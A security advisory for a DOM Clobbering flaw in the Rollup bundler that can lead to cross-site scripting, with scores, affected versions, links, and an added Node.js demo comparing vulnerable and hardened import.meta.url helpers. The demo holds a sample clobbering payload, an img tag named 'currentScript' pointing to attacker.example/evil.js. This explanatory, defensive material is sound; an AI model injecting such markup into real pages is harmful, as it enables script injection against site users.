CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence: High
EPSS
Percentile: 16.3%
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
Rollup is a module bundler for JavaScript. Versions prior to 3.29.5 and 4.22.4 are susceptible to a DOM Clobbering vulnerability when bundling scripts that use properties of import.meta (e.g., import.meta.url) in cjs, umd or iife output format. In these formats Rollup emits code that derives import.meta.url from document.currentScript.src; a page element whose name attribute is "currentScript" (for example an img tag) is exposed as a named property of document and replaces the real script element, so the URL the bundle believes it was loaded from becomes attacker-controlled. Wherever the bundle later loads chunks, workers or other resources relative to that URL, the DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless, attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present. Versions 3.29.5 and 4.22.4 contain a patch for the vulnerability.
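The following is an added example, not Rollup's own code or the advisory's proof of concept. It models the document.currentScript gadget described above with a hand-built stand-in for the browser document so it runs under plain Node.js; the element objects, hostnames, bundle names and function names are constructed for illustration. The vulnerable helper accepts any object with a truthy src, as the pre-fix output did; the hardened helper only trusts a genuine script element, which is the kind of tag-name check the fix applies, and otherwise falls back to resolving the bundle name against document.baseURI.

```javascript
// Added example (not Rollup's code): document.currentScript DOM Clobbering
// gadget modelled with a constructed stand-in for the browser `document`.

// What the browser hands a classic <script> via document.currentScript
// (constructed for this example).
const realScriptElement = {
  tagName: 'SCRIPT',
  src: 'https://app.example/static/bundle.js',
};

// Attacker-injected, scriptless markup present in the page:
//   <img name="currentScript" src="https://attacker.example/evil.js">
// HTMLDocument exposes named elements as properties that take precedence over
// the built-in currentScript getter, so document.currentScript resolves to
// this <img> (constructed for this example).
const clobberingImgElement = {
  tagName: 'IMG',
  src: 'https://attacker.example/evil.js',
};

// Pre-fix shape of the import.meta.url helper for cjs/umd/iife output:
// any object with a truthy .src is accepted as "the current script".
function importMetaUrlVulnerable(document, fileName) {
  const current = document.currentScript;
  return (current && current.src) || new URL(fileName, document.baseURI).href;
}

// Hardened shape: only a real <script> element is trusted; anything else
// (including a clobbering <img>) falls back to the baseURI-relative bundle URL.
function importMetaUrlHardened(document, fileName) {
  const current = document.currentScript;
  const isScript = Boolean(current) && current.tagName.toUpperCase() === 'SCRIPT';
  return (isScript && current.src) || new URL(fileName, document.baseURI).href;
}

// Two page states: the bundle running normally, and the bundle running in a
// page where the attacker's <img name="currentScript"> exists.
function cleanPage() {
  return { baseURI: 'https://app.example/app/', currentScript: realScriptElement };
}
function clobberedPage() {
  return { baseURI: 'https://app.example/app/', currentScript: clobberingImgElement };
}

// A typical downstream sink: a chunk or worker loaded relative to
// import.meta.url. If the base is attacker-controlled, so is the script loaded.
function chunkUrl(base, chunkName) {
  return new URL(chunkName, base).href;
}

function isAttackerControlled(url) {
  return new URL(url).host === 'attacker.example';
}

// Returns the resolved import.meta.url for each combination so the effect of
// the missing tag-name check can be compared directly.
function demo() {
  return {
    vulnerableClean: importMetaUrlVulnerable(cleanPage(), 'bundle.js'),
    vulnerableClobbered: importMetaUrlVulnerable(clobberedPage(), 'bundle.js'),
    hardenedClean: importMetaUrlHardened(cleanPage(), 'bundle.js'),
    hardenedClobbered: importMetaUrlHardened(clobberedPage(), 'bundle.js'),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, url] of Object.entries(demo())) {
    const verdict = isAttackerControlled(url) ? 'ATTACKER-CONTROLLED' : 'ok';
    console.log(`${name}: ${url} -> chunk at ${chunkUrl(url, 'chunk-123.js')} (${verdict})`);
  }
}
```

Run with node; only the vulnerable helper on the clobbered page yields an attacker host, and a chunk resolved against that base lands on attacker.example. Note that the real fix runs inside generated bundle code, so a project is only protected once it has been rebuilt with a patched Rollup; upgrading the dependency without re-bundling leaves the shipped output vulnerable.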
[
  {
    "cpes": [
      "cpe:2.3:a:rollup:rollup:*:*:*:*:*:*:*:*"
    ],
    "vendor": "rollup",
    "product": "rollup",
    "versions": [
      {
        "status": "affected",
        "version": "0",
        "lessThan": "3.29.5",
        "versionType": "custom"
      },
      {
        "status": "affected",
        "version": "4.0.0",
        "lessThan": "4.22.4",
        "versionType": "custom"
      }
    ],
    "defaultStatus": "unknown"
  }
]
github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm